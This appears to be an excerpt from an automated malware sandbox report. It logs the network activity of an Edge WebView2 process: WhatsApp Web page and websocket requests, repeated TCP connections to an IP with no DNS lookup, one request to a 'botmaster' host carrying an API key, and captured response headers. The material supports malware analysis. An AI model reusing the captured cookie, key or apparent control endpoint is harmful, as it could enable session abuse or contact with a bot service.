                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: +m2qXoJ+DyJyVTck/f10Hg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.25.227.174
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: web.whatsapp.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatsapp.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /app-a89b2a183fe14aa356cb.css HTTP/1.1Host: web.whatsapp.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://web.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yI/l/0,cross/C2fHuK6eV5E.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yb/l/0,cross/0n-rMIA_g6I.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yx/l/0,cross/_K0hEQYGPlg.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /v/t39.8562-34/317094452_674406960787691_2379683082953204863_n.png?ccb=1-7&_nc_sid=73b08c&_nc_ohc=oR3xu8RL-Y8AX-4ifa9&_nc_ht=scontent.whatsapp.net&oh=01_AdT3h8Ax7apLe18qhzUe-P1f9GTqK1ua1QGMyu3-SLk1Zw&oe=65F20528 HTTP/1.1Host: scontent.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: KnIcaFPv2DOKiufKDszV5Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: qL2A+XHMyKyLf8i3ZVUwIA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: tHyZpMHuCa2yekMex+wUTg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: 1wgP648fMest6+AY5jmUYg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: +m2qXoJ+DyJyVTck/f10Hg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /api/v2/getwapi.ashx?key=Ju9SWyJu9WQwgnmtZo7m2meGaJg8ciMVZGByC HTTP/1.1Host: botmaster.mediaplus.meConnection: Keep-Alive
                  Source: msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:18:00 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;medi
                  Source: msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:18:00 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;medi
                  Source: msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 22:48:22 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' da
                  Source: msedgewebview2.exe, 00000020.00000003.2393461202.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200content-encoding:brcontent-type:text/css;charset=utf-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sat, 08 Mar 2025 22:48:22 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' da
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow- equals www.facebook.com (Facebook)
                  Source: msedgewebview2.exe, 0000001D.00000002.3694357351.00002DDC003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 200vary:Accept-Encodingcontent-encoding:brcontent-type:application/javascript; charset=UTF-8reporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:same-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:same-origin-allow-popups;report-to="coop_report"pragma:no-cachecache-control:no-cacheexpires:Sat, 01 Jan 2000 00:00:00 GMTx-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 